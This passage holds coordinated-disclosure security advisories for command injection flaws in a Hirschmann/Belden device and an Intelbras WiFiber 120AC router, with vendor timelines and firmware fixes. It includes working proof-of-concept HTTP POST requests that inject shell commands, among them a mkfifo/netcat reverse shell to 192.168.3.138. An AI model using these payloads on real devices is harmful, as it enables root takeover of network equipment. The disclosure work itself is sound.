Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 75
Origin: https://192.168.3.150
Authorization: Digest username=”admin”, realm=”config”, nonce=”4b63bb796252d310″, uri=”/”, algorithm=MD5, response=”dbcf03216bd8fbaa15f4b9d9d0fc1d43″, qop=auth, nc=0000000a, cnonce=”99c14d39557e691d”
Referer: https://192.168.3.150/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

ajax=FsCreateDir&dir=’%3Bping%20192.168.1.1%3B’&iehack=&submit=Create&cwd=/

Upgrade to firmware version 09.13.01.00R04 or above.

A security bulletin for this vulnerability has been published by the vendor:
https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/

None

CyberDanube recommends customers from Hirschmann to upgrade the firmware to the latest version available. Furthermore, a full security review by professionals is recommended.

• 2022-08-03: Contacting Hirschmann via BEL-SM-PSIRT@belden.com; Belden contact suspects a duplicate. Asked contact for more information.
• 2022-08-18: Belden representative sent more information for clarification. Highlighted differences between PoCs.
• 2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.
• 2022-08-30: Asked for an update.
• 2022-08-31: Vendor stated, that he will release another security bulletin for this vulnerability.
• 2022-09-27: Asked for an update.
• 2022-09-28: Vendor is currently testing the new firmware version and has also been assigned with an CVE number. Draft of security bulletin was also sent by the security contact.
• 2022-10-12: Asked for an update.
• 2022-10-13: Belden contact stated, that there is no publication date for now as another patch must be integrated.
• 2022-10-28: Security contact informed us, that the patch will be released
  within the next two weeks.
• 2022-11-22: Asked for a status update; Security contact stated, that the
  release was delayed due internal reasons.
• 2022-11-23: Vendor sent the final version of the security bulletins. The release of the new firmware version will be 2022-11-28.
• 2022-11-24: Vendor informed CyberDanube that the release of the bulletin and the firmware was done on 2022-11-23 by the marketing team. Coordinated release of security advisory.

The Intelbras WiFiber 120AC inMesh is prone to an authenticated command injection vulnerability. This vulnerability can be used to execute arbitrary commands on the device.

“We are Intelbras. A company that for 45 years has been offering innovative solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an INspiration and a promising idea: to manufacture PABX centrals. During the 80’s, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s were marked by the consolidation of the company in the telecommunications segment and we became leaders in the PABX and telephone terminals segment. The turn of the millennium represented the search for greater connection and proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC. We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our DNA, increasingly present in our daily lives. And it was only possible to write a story so full of achievements because employees, partners and customers were close and believed in us.”

Source: https://www.intelbras.com/en/institutional/who-we-are

WiFiber 120AC inMesh / 1.1-220216

1) Authenticated Command Injection
An authenticated command injection has been identified in the web configuration service of the device. It can be used to execute system commands on the OS from the device in the context of the user “root”. Therefore, a full compromization of the device is possible by having credentials for the web service only.

The web server is prone to an authenticated command injection via POST parameters. The following proof-of-concept shows how to inject the command “ls /” to the system which gets executed in the background:

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.3.147
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/ping6.asp
Upgrade-Insecure-Requests: 1

pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908

"rm -f /tmp/f"
"mkfifo /tmp/f"
"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"

POST /boaform/formTracert HTTP/1.1
Host: 192.168.3.147
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/tracert.asp
Upgrade-Insecure-Requests: 1

proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290

Update to firmware version 1-1-220826.

https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip

None

CyberDanube recommends Intelbras customers to upgrade the firmware to the latest version available.

• 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.
• 2022-08-03: Request from Intelbras to send the advisory to csirt@intelbras.com.br; Sent the advisory to this address.
• 2022-08-30: Asked for status update; Vendor answered that the new firmware version has been released the day before. Set the disclosure date to 2022-10-03 (60 days policy).
• 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
• 2022-10-09: Coordinated disclosure of advisory.